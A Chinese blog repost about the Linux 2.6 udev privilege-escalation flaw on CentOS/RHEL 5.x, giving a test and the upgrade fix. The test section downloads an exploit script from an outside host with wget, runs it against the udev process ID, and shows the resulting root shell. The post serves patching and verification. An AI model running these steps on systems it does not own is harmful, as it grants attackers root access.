关于Linux 2.6kernel udev 漏洞的检测及修补

本文详细介绍了近期发现的Linux udev漏洞,该漏洞影响CentOS/RHEL 5.x(除5.3版)及2.6内核系列。文章提供了检测漏洞的步骤以及如何通过升级udev软件包来解决此问题的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

转自:http://blog.chinaunix.net/uid-7387830-id-119510.html


最近闹的很凶的linux udev漏洞对2.6系列的CentOS/RHEL 5.x(除了5.3)都有效,而对2.4系列的则无效,对于CentOS/RHEL 4.x 经过测试,按本文攻击方法无效,但是否真的无效还有待真正高手验证请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器(2.6 kernel,5.x 系列)全部升级完毕。以下是检测方法和升级方法,请路过使用受影响的linux系统的朋友一定要参考并升级,否则很容易出问题。这次可以通过任意web程序来实现攻击,而且成功率几乎100%。

请看过此帖的朋友帮忙顶一下帖,今天测了好几个服务器都有这个问题,全都修复了。

检测方法:

引用:
1)下载攻击脚本:
wget  http://www.extmail.org/source/exploit-udev-8478

2)获得udev进程号
执行: ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号,然后将此数字减1作为
exploit-udev-8478的参数,例如命令结果为143则参数为142

3)执行:
sh exploit-udev-8478 142
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-3.1#
然后id 看看:
uid=0(root) gid=0(root) groups=65530(hzqbbc)

顺利获得root权限,如果无法获得root权限,要多执行脚本几次,一般第二次即可获得root权限。
解决/预防方法

唯一的就是要立刻升级udev软件包,此软件包升级后不需要重启动。方法很简单,请升级对应版本的官方最新udev,尤其要注意查看是否将这个漏洞补掉, EMOS 用户可以很简单的用yum升级:

yum update udev

升级完毕后再用检测方法检测一遍以确保没有问题!强烈建议再重新做检测时,执行以下命令清除掉上一次入侵成功的临时文件,否则升级完也会攻击成功的。

以root权限执行: 
引用:
rm -rf /tmp/libno_ex*
rm -rf /tmp/suid
rm -rf /tmp/udev

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值